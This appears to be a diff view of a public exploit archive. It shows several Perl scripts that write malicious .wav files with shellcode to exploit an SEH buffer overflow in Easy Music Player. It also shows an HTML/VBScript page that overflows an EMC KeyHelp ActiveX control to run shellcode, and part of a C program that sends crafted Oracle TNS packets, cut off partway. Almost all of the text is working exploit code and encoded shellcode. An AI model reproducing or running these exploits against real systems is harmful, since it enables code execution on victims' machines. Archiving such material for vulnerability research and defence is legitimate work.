"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################
# milw0rm.com [2009-08-11]
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################
# milw0rm.com [2009-08-11]

78
platforms/windows/local/9418.pl
View file

@ -1,39 +1,39 @@
#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-11]
#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-11]

82
platforms/windows/local/9420.pl
View file

@ -1,41 +1,41 @@
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# first http://www.milw0rm.com/exploits/9412
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
############################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-12]
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# first http://www.milw0rm.com/exploits/9412
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
############################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-12]

60
platforms/windows/remote/10008.txt
View file

@ -1,60 +0,0 @@
<!--
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
buffer overflow exploit
(ie8 xp sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
tested products:
EMC Captiva QuickScan Pro 4.6 sp1
EMC Documentum ApllicationXtender Desktop 5.4
and possibly other products carrying quickscan
CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
Progid: KeyHelp.KeyCtrl.1
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
-->
<html>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>

386
platforms/windows/remote/10080.txt
View file

@ -1,386 +0,0 @@
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;
printf ("s_send: begin: %d bytes\n", size);
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
} else
if (sent!=size)
printf ("sent only %d bytes\n", sent);
printf ("s_send: end\n");
};
void s_recv (SOCKET s)
{
char buf[20000];
int r;
struct timeval t;
fd_set fd;
t.tv_sec=0;
t.tv_usec=100000; // 100 ms
printf ("s_recv: begin\n");
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf ("got %d bytes\n", r);
}
else
{
printf ("connection lost, r=%d\n", r);
};
}
else
{
printf ("select() returns zero\n");
};
};
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;
buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
s_send (s, (char*)buf, sz);
free (buf);
};
void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);
printf ("sending [%s]\n", cmd);
printf ("len: %d\n", cmd_len);
if (cmd_len<231)
{
int str_len=strlen(cmd);
int pkt_len=str_len+58;
pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
"\x00\x00\x00\x00\x01\x00\x00\x00"
// plenH, plenL
"\x01\x3A\x01\x2C\x00\x41\x20\x00"
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
"\x00\x00\x00\x3A\x00\x00\x02\x00"
// cmdlenH cmdlenL
"\x61\x61\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00", 58);
memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;
pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;
s_send (s, (char*)pkt, pkt_len);
free (pkt);
}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};
bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];
WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};
sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, 0, &fd, 0, &t))
{
printf ("connected to %s\n", h);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTAC
s_recv(s);
// send NA packet
s_send (s,
"\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
,156);
s_recv (s);
// send TTIPRO
s_send (s,
"\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
"\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
"\x2E\x31\x2E\x30\x00"
, 37);
s_recv (s);
// send TTIDTY
s_send (s,
"\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
, 75);
s_recv (s);
// call OSESSKEY
s_send (s,
"\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
"\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
"\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
"\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
"\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
"\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
"\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
"\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
"\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
"\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
, 218);
// call OAUTH
memcpy (pkt1318,
"\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
"\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
"\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
"\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
"\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
"\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
"\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
"\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
"\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
"\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
"\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
"\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
"\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
"\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
"\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
"\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
"\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
